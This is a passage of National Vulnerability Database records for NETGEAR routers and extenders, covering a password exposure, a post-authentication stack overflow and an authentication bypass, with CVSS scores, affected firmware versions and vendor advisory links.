R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06."
},
{
"lang": "es",
"value": "Determinados dispositivos de NETGEAR est\u00e1n afectados por una exposici\u00f3n de contrase\u00f1as. Esto afecta a AC1450 hasta el 06-01-2017, C6300 hasta el 06-01-2017, D500 hasta el 06-01-2017, D1500 hasta el 06-01-2017, D3600 hasta el 06-01-2017, D6000 hasta el 06-01-2017, D6100 hasta el 06-01-2017, D6200 hasta el 06-01-2017, D6200B hasta el 06-01-2017, D6300B hasta el 06-01-2017, D6300 hasta el 06-01-2017, DGN1000v3 hasta el 06-01-2017, DGN2200v1 hasta el 06-01-2017, DGN2200v3 hasta el 06-01-2017, DGN2200V4 hasta el 06-01-2017, DGN2200Bv3 hasta el 06-01-2017, DGN2200Bv4 hasta el 06-01-2017, DGND3700v1 hasta el 06-01-2017, DGND3700v2 hasta el 06-01-2017, DGND3700Bv2 hasta el 06-01-2017, JNR1010v1 hasta el 06-01-2017, JNR1010v2 hasta el 06-01-2017, JNR3300 hasta el 06-01-2017, JR6100 hasta el 06-01-2017, JR6150 hasta el 06-01-2017, JWNR2000v5 hasta el 06-01-2017, R2000 hasta el 06-01-2017, R6050 hasta el 06-01-2017, R6100 hasta el 06-01-2017, R6200 hasta el 06-01-2017, R6200v2 hasta el 06-01-2017, R6220 hasta el 06-01-2017, R6250 hasta el 06-01-2017, R6300 hasta el 06-01-2017, R6300v2 hasta el 06-01-2017, R6700 hasta el 06-01-2017, R7000 hasta el 06-01-2017, R7900 hasta el 06-01-2017, R7500 hasta el 06-01-2017, R8000 hasta el 06-01-2017, WGR614v10 hasta el 06-01-2017, WNR1000v2 hasta el 06-01-2017, WNR1000v3 hasta el 06-01-2017, WNR1000v4 hasta el 06-01-2017, WNR2000v3 hasta el 06-01-2017, WNR2000v4 hasta el 06-01-2017, WNR2000v5 hasta el 06-01-2017, WNR2200 hasta el 06-01-2017, WNR2500 hasta el 06-01-2017, WNR3500Lv2 hasta el 06-01-2017, WNDR3400v2 hasta el 06-01-2017, WNDR3400v3 hasta el 06-01-2017, WNDR3700v3 hasta el 06-01-2017, WNDR3700v4 hasta el 06-01-2017, WNDR3700v5 hasta el 06-01-2017, WNDR4300 hasta el 06-01-2017, WNDR4300v2 hasta el 06-01-2017, WNDR4500v1 hasta el 06-01-2017, WNDR4500v2 hasta el 06-01-2017, and WNDR4500v3 hasta el 06-01-2017."
}
],
"id": "CVE-2016-11059",
"lastModified": "2024-11-21T02:45:24.220",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-28T17:15:12.460",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 21:15
Modified
2024-11-21 04:03
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | dgn2200b_firmware | * | |
| netgear | dgn2200b | v4 | |
| netgear | dgn2200_firmware | * | |
| netgear | dgn2200 | v4 | |
| netgear | ex3700_firmware | * | |
| netgear | ex3700 | - | |
| netgear | ex3800_firmware | * | |
| netgear | ex3800 | - | |
| netgear | ex6000_firmware | * | |
| netgear | ex6000 | - | |
| netgear | ex6100_firmware | * | |
| netgear | ex6100 | - | |
| netgear | ex6120_firmware | * | |
| netgear | ex6120 | - | |
| netgear | ex6130_firmware | * | |
| netgear | ex6130 | - | |
| netgear | ex6150_firmware | * | |
| netgear | ex6150 | - | |
| netgear | ex6200_firmware | * | |
| netgear | ex6200 | - | |
| netgear | ex7000_firmware | * | |
| netgear | ex7000 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900p_firmware | * | |
| netgear | r7900p | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8000p_firmware | * | |
| netgear | r8000p | - | |
| netgear | wn2500rp_firmware | * | |
| netgear | wn2500rp | v2 | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "15616D3A-6741-42CE-926D-171CB231C88D",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72004304-314A-4BE6-A33E-7F4CDF01FCEF",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "746ADED9-4517-4482-AAEF-ACD301B433F8",
"versionEndExcluding": "1.0.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F10249E2-7DDE-4E3D-91FE-FB3FBA3682B0",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03DFA0CD-2C01-4885-B126-E24FCA5F9D6B",
"versionEndExcluding": "1.0.3.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2EC7119-878C-4E8F-97B0-DAD86E138F8C",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FF768B9B-5C16-494F-95E7-F938798A4C5E",
"versionEndExcluding": "1.0.4.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07AC82A1-7C63-4CC1-BF7E-695084B2F325",
"versionEndExcluding": "1.3.0.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2A5F74BE-5D7A-4CCF-B7A7-F5AAE4DD5DAE",
"versionEndExcluding": "1.3.0.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6DFB128D-2F6F-439B-AFE0-FAAE762F008D",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un usuario autenticado. Esto afecta a DGN2200Bv4 versiones anteriores a 1.0.0.102, DGN2200v4 versiones anteriores a 1.0.0.102, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1.0.0.30, EX6100 versiones anteriores a 1.0.2.22, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150 versiones anteriores a 1.0.0.38, EX6200 versiones anteriores a 1.0.3.86, EX7000 versiones anteriores a 1.0.0.64, R6300v2 versiones anteriores a 1.0.4.22, R6900P versiones anteriores a 1.3.0.18, R7000P versiones anteriores a 1.3.0.18, R7300DST versiones anteriores a 1.0.0.62, R7900P versiones anteriores a 1.3.0.10, R8000 versiones anteriores a 1.0.4.12, R8000P versiones anteriores a 1.3.0.10, WN2500RPv2 versiones anteriores a 1.0.1.52 y WNDR3400v3 versiones anteriores a 1.0.1.18."
}
],
"id": "CVE-2018-21163",
"lastModified": "2024-11-21T04:03:03.427",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T21:15:11.940",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-08-11 00:15
Modified
2024-11-21 06:17
Severity ?
2.4 (Low) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
2.7 (Low) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
2.7 (Low) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C8A5E09-861A-4C5F-8C0A-96803782E9EF",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "33C16A69-C930-4DA3-8750-EB50F2827731",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8DE5478F-11CE-4730-AC60-64ACE7BBB03A",
"versionEndExcluding": "1.0.0.63",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9FCEBCD7-1D0D-47F6-BC72-A53BFBF3662D",
"versionEndExcluding": "1.1.00.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4F36AC74-11DB-4805-9B73-302F86A8C240",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
